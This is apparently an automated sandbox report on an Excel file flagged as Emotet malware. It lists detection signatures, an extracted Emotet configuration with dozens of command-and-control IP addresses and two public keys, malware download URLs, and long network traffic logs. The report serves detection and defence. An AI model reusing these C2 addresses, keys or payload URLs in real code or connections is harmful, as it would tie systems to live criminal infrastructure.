Windows Analysis Report
PO0000001552.xls

Overview

General Information

Sample Name: PO0000001552.xls
Analysis ID: 745091
MD5: ecdc3f1e9afd2ce212a12ba3a844f521
SHA1: 0121ba555dfe0b42834759d201cce505bd619f86
SHA256: 1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Office process drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: PO0000001552.xls Virustotal: Detection: 66%
Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F Avira URL Cloud: Label: malware
Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/ Avira URL Cloud: Label: malware
Source: http://ly.yjlianyi.top/wp-admin/4cChao/ Avira URL Cloud: Label: malware
Source: http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/ Avira URL Cloud: Label: malware
Source: https://182.162.143.56/tkafmhcgcid/ Avira URL Cloud: Label: malware
Source: https://182.162.143.56/ Avira URL Cloud: Label: malware
Source: sbm.xinmoshiwang.com Virustotal: Detection: 13%
Source: datie-tw.com Virustotal: Detection: 10%
Source: copunupo.ac.zm Virustotal: Detection: 17%
Source: ly.yjlianyi.top Virustotal: Detection: 13%
Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}
Source: unknown HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: EvvmhfKiKFhKrSuHfBq[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\2yXcjy57oZTTUNweDidCGUY[1].dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA
Source: global traffic DNS query: name: datie-tw.com
Source: global traffic DNS query: name: sbm.xinmoshiwang.com
Source: global traffic DNS query: name: copunupo.ac.zm
Source: global traffic DNS query: name: ly.yjlianyi.top
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49705 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 173.255.211.88:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49712 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49713 -> 182.162.143.56:443
Source: global traffic TCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
Source: global traffic TCP traffic: 192.168.2.3:49703 -> 81.68.152.197:80

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 45.63.99.23 7080
Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.255.211.88 443
Source: C:\Windows\System32\regsvr32.exe Network Connect: 182.162.143.56 443
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:63177 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49705 -> 173.255.211.88:443
Source: Traffic Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49709 -> 45.63.99.23:7080
Source: Traffic Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.3:49712 -> 182.162.143.56:443
Source: Joe Sandbox View ASN Name: RACKCORP-APRackCorpAU
Source: Joe Sandbox View ASN Name: INPL-IN-APIshansNetworkIN
Source: Joe Sandbox View JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global traffic HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Content-Length: 284 | Host: 182.162.143.56
Source: global traffic HTTP traffic detected: POST /qqvehgyxm/bitss/ktcpnaio/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Content-Length: 304 | Host: 182.162.143.56
Source: Joe Sandbox View IP Address: 110.232.117.186
Source: Joe Sandbox View IP Address: 103.132.242.26
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Sun, 13 Nov 2022 18:26:51 GMT | Content-Type: application/x-msdownload | Content-Length: 433152 | Connection: keep-alive | X-Powered-By: PHP/7.1.5 | Set-Cookie: 637136ebdcf92=1668364011; expires=Sun, 13-Nov-2022 18:27:51 GMT; Max-Age=60; path=/ | Cache-Control: no-cache, must-revalidate | Pragma: no-cache | Last-Modified: Sun, 13 Nov 2022 18:26:51 GMT | Expires: Sun, 13 Nov 2022 18:26:51 GMT | Content-Disposition: attachment; filename="EvvmhfKiKFhKrSuHfBq.dll" | Content-Transfer-Encoding: binary
